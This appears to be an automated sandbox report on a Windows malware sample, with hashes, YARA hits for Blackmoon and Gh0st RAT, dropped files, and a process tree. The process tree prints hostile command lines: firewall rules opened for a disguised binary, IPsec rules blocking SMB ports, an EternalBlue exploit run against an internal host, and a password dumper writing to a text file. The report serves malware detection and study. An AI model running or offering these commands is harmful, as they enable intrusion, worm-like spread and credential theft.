Analysis
-
max time kernel
1s -
max time network
90s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system -
submitted
01-07-2024 01:20
Behavioral task
behavioral1
Sample
d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe
Resource
win10v2004-20240508-en
General
-
Target
d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe
-
Size
45KB
-
MD5
3d3aedfaeaf39544ff74fe6fe4541fc2
-
SHA1
ad4135e142b3e9564d90d96eca0c21e17f0de542
-
SHA256
d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71
-
SHA512
703b057201b3b261225cca58799c05caa152c5643f7de012d9fb1aff523f35c7c1ac7d24d14bcd3fe67c51b33230d864063077b59e1264ca1da1eada443db581
-
SSDEEP
768:XQ7R4nqTvoV22QbyMhOk9w+wRGtVEhq8C5eIdp5b4Fk0v5za:w4nVV22Q+mO0wrwVEUdpaFjv5G
Malware Config
Signatures
-
Detect Blackmoon payload 7 IoCs
Processes:
resource yara_rule behavioral1/memory/2844-36-0x0000000000400000-0x0000000000484000-memory.dmp family_blackmoon behavioral1/memory/384-60-0x0000000000400000-0x0000000000D0A000-memory.dmp family_blackmoon behavioral1/memory/384-90-0x0000000000400000-0x0000000000D0A000-memory.dmp family_blackmoon behavioral1/memory/384-94-0x0000000000400000-0x0000000000D0A000-memory.dmp family_blackmoon behavioral1/memory/384-13624-0x0000000000400000-0x0000000000D0A000-memory.dmp family_blackmoon behavioral1/memory/384-13645-0x0000000000400000-0x0000000000D0A000-memory.dmp family_blackmoon C:\Windows\Temp\Wmicc.exe family_blackmoon -
Gh0st RAT payload 4 IoCs
Processes:
resource yara_rule \Windows\Logs\RunDllExe.dll family_gh0strat behavioral1/memory/936-33-0x0000000000400000-0x0000000000409000-memory.dmp family_gh0strat behavioral1/memory/936-32-0x0000000000400000-0x0000000000409000-memory.dmp family_gh0strat behavioral1/memory/2844-36-0x0000000000400000-0x0000000000484000-memory.dmp family_gh0strat -
Detects executables containing possible sandbox analysis VM usernames 6 IoCs
Processes:
resource yara_rule behavioral1/memory/384-60-0x0000000000400000-0x0000000000D0A000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxUserNames behavioral1/memory/384-90-0x0000000000400000-0x0000000000D0A000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxUserNames behavioral1/memory/384-94-0x0000000000400000-0x0000000000D0A000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxUserNames behavioral1/memory/384-13624-0x0000000000400000-0x0000000000D0A000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxUserNames behavioral1/memory/384-13645-0x0000000000400000-0x0000000000D0A000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxUserNames C:\Windows\Temp\Wmicc.exe INDICATOR_SUSPICIOUS_EXE_SandboxUserNames -
Detects executables embedding registry key / value combination indicative of disabling Windows Defender features 3 IoCs
Processes:
resource yara_rule behavioral1/memory/2096-0-0x0000000000400000-0x0000000000420000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RegKeyComb_DisableWinDefender behavioral1/memory/2096-1-0x0000000010000000-0x000000001001A000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RegKeyComb_DisableWinDefender behavioral1/memory/2844-36-0x0000000000400000-0x0000000000484000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RegKeyComb_DisableWinDefender -
UPX dump on OEP (original entry point) 11 IoCs
Processes:
resource yara_rule behavioral1/memory/2096-0-0x0000000000400000-0x0000000000420000-memory.dmp UPX C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe UPX behavioral1/memory/2336-7-0x0000000000400000-0x0000000000420000-memory.dmp UPX C:\Windows\4455.exe UPX behavioral1/memory/2844-29-0x0000000000400000-0x0000000000484000-memory.dmp UPX behavioral1/memory/2844-36-0x0000000000400000-0x0000000000484000-memory.dmp UPX \Windows\Temp\MpMgSvc.exe UPX behavioral1/memory/384-60-0x0000000000400000-0x0000000000D0A000-memory.dmp UPX behavioral1/memory/384-90-0x0000000000400000-0x0000000000D0A000-memory.dmp UPX behavioral1/memory/384-94-0x0000000000400000-0x0000000000D0A000-memory.dmp UPX behavioral1/memory/384-13624-0x0000000000400000-0x0000000000D0A000-memory.dmp UPX -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 2152 netsh.exe 1420 netsh.exe -
Processes:
resource yara_rule behavioral1/memory/2096-0-0x0000000000400000-0x0000000000420000-memory.dmp upx C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe upx behavioral1/memory/2336-7-0x0000000000400000-0x0000000000420000-memory.dmp upx C:\Windows\4455.exe upx behavioral1/memory/2844-29-0x0000000000400000-0x0000000000484000-memory.dmp upx behavioral1/memory/2844-36-0x0000000000400000-0x0000000000484000-memory.dmp upx \Windows\Temp\MpMgSvc.exe upx behavioral1/memory/384-60-0x0000000000400000-0x0000000000D0A000-memory.dmp upx behavioral1/memory/384-90-0x0000000000400000-0x0000000000D0A000-memory.dmp upx behavioral1/memory/384-94-0x0000000000400000-0x0000000000D0A000-memory.dmp upx behavioral1/memory/384-13624-0x0000000000400000-0x0000000000D0A000-memory.dmp upx behavioral1/memory/384-13645-0x0000000000400000-0x0000000000D0A000-memory.dmp upx behavioral1/memory/384-13660-0x0000000000400000-0x0000000000D0A000-memory.dmp upx -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 110.11.158.238 -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Drops file in Windows directory 2 IoCs
Processes:
d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exedescription ioc process File created C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe File opened for modification C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 30 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc process Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
Suspicious use of WriteProcessMemory 40 IoCs
Processes:
d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exedescription pid process target process PID 2096 wrote to memory of 1420 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 1420 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 1420 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 1420 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2152 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2152 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2152 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2152 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 1164 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 1164 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 1164 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 1164 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2704 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2704 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2704 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2704 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2724 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2724 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2724 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2724 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2644 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2644 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2644 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2644 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2956 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2956 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2956 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2956 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2608 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2608 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2608 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2608 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2652 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2652 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2652 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2652 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2736 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2736 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2736 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe PID 2096 wrote to memory of 2736 2096 d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe netsh.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe"C:\Users\Admin\AppData\Local\Temp\d0a798b5e7ef375f640e4f4f2329a8e40c6ea4d9f65ce63d513fc1b00ad1da71.exe"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=out program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Microsoft.Net" dir=in program="C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exe" action=allow2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" ipsec static add policy name=Block2⤵
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" ipsec static add filterlist name=Filter12⤵
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" ipsec static add filteraction name=FilteraAtion1 action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion12⤵
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" ipsec static set policy name=Block assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exeC:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe1⤵
-
C:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exeC:\Windows\Microsoft.Net\Framework\v3.5\mscorsvw.exe Win72⤵
-
C:\Windows\4455.exe"C:\Windows\4455.exe"2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Block3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=Filter13⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=FilteraAtion1 action=block3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion13⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Block assign=y3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Sleep -s 2;del "C:\Windows\4455.exe"3⤵
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\SysWOW64\svchost.exe"1⤵
-
C:\WINDOWS\Temp\MpMgSvc.exe"C:\WINDOWS\Temp\MpMgSvc.exe"2⤵
-
C:\WINDOWS\Temp\Eternalblue-2.2.0.exeEternalblue-2.2.0.exe --TargetIp 10.127.0.179 --Target WIN72K8R2 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig LOG.txt3⤵
-
C:\WINDOWS\Temp\Eternalblue-2.2.0.exeEternalblue-2.2.0.exe --TargetIp 10.127.0.179 --Target WIN72K8R2 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig LOG.txt3⤵
-
C:\Windows\Temp\Wmicc.exe"C:\Windows\Temp\Wmicc.exe"3⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\Temp\GetPassword.exe >C:\Windows\Temp\PWD.txt4⤵
-
C:\Windows\Temp\GetPassword.exeC:\Windows\Temp\GetPassword.exe5⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\WINDOWS\Temp\posh-0.dllFilesize
11KB
MD52f0a52ce4f445c6e656ecebbcaceade5
SHA135493e06b0b2cdab2211c0fc02286f45d5e2606d
SHA256cde45f7ff05f52b7215e4b0ea1f2f42ad9b42031e16a3be9772aa09e014bacdb
SHA51288151ce5c89c96c4bb086d188f044fa2d66d64d0811e622f35dceaadfa2c7c7c084dd8afb5f774e8ad93ca2475cc3cba60ba36818b5cfb4a472fc9ceef1b9da1
-
C:\Windows\4455.exeFilesize
162KB
MD5ce1d781ff2e37b62bc314b53c6dae49d
SHA19927eafa1c92788774c3653ded4eba03e6b5d96a
SHA2569591e4d1090bc5caa1d1db4ebf929d9113fd36e0521d316762f5cff275b4c733
SHA5125fc2faacc8db2c88c0f46634a7a09c8fdc3f1efc4ccf98b10eca3e02147a8c91653a5a27644f5c7e4ec82fc8d3d8f281b2a4c9a075d07588b87684bcab81a672
-
C:\Windows\Microsoft.NET\Framework\v3.5\mscorsvw.exeFilesize
20.0MB
MD509a2fe09dc328d0061c70b7355af4226
SHA1615f8a9693e1b8843981c0e95895a9316cda2f64
SHA256dacfaf5624e25339114f22694d69120621c779d091a93c38cf4ed71f4f64aa85
SHA5122c17356250f38aef17d2e0ce1d7ea73600e53931bc85844d215fa22b665626186560cd3d344559c425e0a97fab4be8aa66bc9e9d2728815cf46b4edd391d2ef2
-
C:\Windows\Temp\Eternalblue-2.2.0.xmlFilesize
7KB
MD5497080fed2000e8b49ee2e97e54036b1
SHA14af3fae881a80355dd09df6e736203c30c4faac5
SHA256756f44f1d667132b043bfd3da16b91c9f6681e5d778c5f07bb031d62ff00d380
SHA5124f8bd09f9d8d332c436beb8164eec90b0e260b69230f102565298beff0db37265be1ae5eb70acf60e77d5589c61c7ee7f01a02d2a30ac72d794a04efef6f25df
-
C:\Windows\Temp\GetPassword.exeFilesize
494KB
MD55b6a804db0c5733d331eb126048ca73b
SHA1f18c5acae63457ad26565d663467fa5a7fbfbee4
SHA2565bec6b3bc6f8cbda50a8c5195a488cc82d2e00f18ec75640db31b2376a6db9f9
SHA512ba6424051ab9f650967cc2ba428fd6a02ccda8f99d8b8e3f5f321a5e6bbf79a22bfc9cdd582c44980470ebbb7aea1b811fd69aab6bf51466a803c7c722fcde26
-
C:\Windows\Temp\PWD.txtFilesize
29B
MD5be8f141e4550cc702bd43a7ef29b052d
SHA17d391b830fb37cff477c4fea208ae29d149871b1
SHA2564f344059be68b21ec54a525f34fc476749d16f651b1ad07f887497c05358a5bb
SHA512930ead7cad952221d36f7d747b39b2b333249c782bda2eea70adfe9e55a699babe40966f35fdfdc028d9aa3176c7058970919e569c6777482083dc8e5da404e5
-
C:\Windows\Temp\Wmicc.exeFilesize
1.0MB
MD5e1f8ee38a7e1f76e636499eb40aec1ca
SHA16d5688ea53b2fe9a3fd751350446f6205d94dba0
SHA256c82e90cf223bf9c1fb77d44d2cd7678d7ad6994363973502633e7f25fdbd2d93
SHA51266ca4dcb5cbf0efbed23b8edf8763bac1b8c1090bb797fb53b00b18d3bf751b4c2e685699f3b08bed393fb0d5183d1a86780291369b817e241e8a0f1224a7ec1
-
C:\Windows\Temp\ip.txtFilesize
92KB
MD52a1c30784b7ba1a212d82d693f49f217
SHA19b4c9f3236d0b239e3ddd28621af57aa29e4c09a
SHA2563e7f856f13e8372c733f7aa1e0e2ff745525f281fc0061089389afd43f9f0ec2
SHA5120a97bb22bb5d34ad8e6b9159f261e135b2737f120332a119b158c9d3c63001b4911e96cb9f1f86a198e56c1aff53800ebbef54aecfc521f4568b6d8a66671994
-
C:\Windows\Temp\ip.txtFilesize
1KB
MD56239bfe2e88c1bbbf8661bbb51ee775e
SHA1a0fe5dd915d67a49432a90302e323fbe5c2e83ce
SHA256085554735e759fcca498cdddfd0bf7f21a262672c48233d80775cd26bbd41b7b
SHA512016a3b2ecdcd27cf22fc91c0cd07441abed2a97c6b8c7954aff8db4e1dd937f2fa0c5bbc6edbf94479be715fa5d927c1c702d1623766af0912d49008a4018e99
-
C:\Windows\Temp\ip.txtFilesize
4KB
MD5a83ed968c49487fa60ed8d6b530f0687
SHA1fd6c9f6f40a8c8e4e6b63c3be7d0fabb28a02261
SHA256219200ccd149ab3550d84eaf2ff40da39a07dd68d3f1a463dec148050d814059
SHA51264e8ec3aed3e75aa7357ac2335aa41d3b867a4c01e75d7a384562437727959c7fd073ded86db0b7abf417b80a9c57861b44282ca1a210514cac97b966cc24a12
-
\Windows\Logs\RunDllExe.dllFilesize
175KB
MD55847af6bde1243a8810f60e9f48ace97
SHA19652e1d1640dda10803f5fb6909e674e1ea67488
SHA25623593861e71b86eb3944f55e780f89fee3da35c0b6a7c88b5e526bc84803fadf
SHA51275f1f17ccba168b36b52fa54d034e6caa0f234ecbbdd02c63a8b91ba4e99a88775b1544fcc0d1e347092bcb03213baebad4207db5dd3f663372a8c50098ddc65
-
\Windows\Temp\Eternalblue-2.2.0.exeFilesize
126KB
MD58c80dd97c37525927c1e549cb59bcbf3
SHA14e80fa7d98c8e87facecdef0fc7de0d957d809e1
SHA25685b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5
SHA51250e9a3b950bbd56ff9654f9c2758721b181e7891384fb37e4836cf78422399a07e6b0bfab16350e35eb2a13c4d07b5ce8d4192fd864fb9aaa9602c7978d2d35e
-
\Windows\Temp\MpMgSvc.exeFilesize
3.2MB
MD52311a69113104a760d785a79f45bab74
SHA132e883771883ba44715180e92a20c80638c5c78f
SHA256f2af31b74bfe1648b8c06ce5b3869e81ce8caafe4a265e007af4036af3448ae7
SHA512aafbd53acb886e6ab7706400852e8b79766ae99f5899b45952dc21cc55d91f0dca2d86e25f2568dc2b497a73a9c7e70682f98d8901c8089ac5650e46e1dd87e1
-
\Windows\Temp\coli-0.dllFilesize
15KB
MD53c2fe2dbdf09cfa869344fdb53307cb2
SHA1b67a8475e6076a24066b7cb6b36d307244bb741f
SHA2560439628816cabe113315751e7113a9e9f720d7e499ffdd78acbac1ed8ba35887
SHA512d6b819643108446b1739cbcb8d5c87e05875d7c1989d03975575c7d808f715ddcce94480860828210970cec8b775c14ee955f99bd6e16f9a32b1d5dafd82dc8c
-
\Windows\Temp\exma-1.dllFilesize
10KB
MD5ba629216db6cf7c0c720054b0c9a13f3
SHA137bb800b2bb812d4430e2510f14b5b717099abaa
SHA25615292172a83f2e7f07114693ab92753ed32311dfba7d54fe36cc7229136874d9
SHA512c4f116701798f210d347726680419fd85880a8dc12bf78075be6b655f056a17e0a940b28bbc9a5a78fac99e3bb99003240948ed878d75b848854d1f9e5768ec9
-
\Windows\Temp\libxml2.dllFilesize
807KB
MD59a5cec05e9c158cbc51cdc972693363d
SHA1ca4d1bb44c64a85871944f3913ca6ccddfa2dc04
SHA256aceb27720115a63b9d47e737fd878a61c52435ea4ec86ba8e58ee744bc85c4f3
SHA5128af997c3095d728fe95eeedfec23b5d4a9f2ea0a8945f8c136cda3128c17acb0a6e45345637cf1d7a5836aaa83641016c50dbb59461a5a3fb7b302c2c60dfc94
-
\Windows\Temp\tibe-2.dllFilesize
232KB
MD5f0881d5a7f75389deba3eff3f4df09ac
SHA18404f2776fa8f7f8eaffb7a1859c19b0817b147a
SHA256ca63dbb99d9da431bf23aca80dc787df67bb01104fb9358a7813ed2fce479362
SHA512f266baecae0840c365fe537289a8bf05323d048ef3451ebffbe75129719c1856022b4bddd225b85b6661bbe4b2c7ac336aa9efdeb26a91a0be08c66a9e3fe97e
-
\Windows\Temp\trch-1.dllFilesize
58KB
MD5838ceb02081ac27de43da56bec20fc76
SHA1972ab587cdb63c8263eb977f10977fd7d27ecf7b
SHA2560259d41720f7084716a3b2bbe34ac6d3021224420f81a4e839b0b3401e5ef29f
SHA512bcca9e1e2f84929bf513f26cc2a7dc91f066e775ef1d34b0fb00a54c8521de55ef8c81f796c7970d5237cdeab4572dedfd2b138d21183cb19d2225bdb0362a22
-
\Windows\Temp\trfo-2.dllFilesize
29KB
MD53e89c56056e5525bf4d9e52b28fbbca7
SHA108f93ab25190a44c4e29bee5e8aacecc90dab80c
SHA256b2a3172a1d676f00a62df376d8da805714553bb3221a8426f9823a8a5887daaa
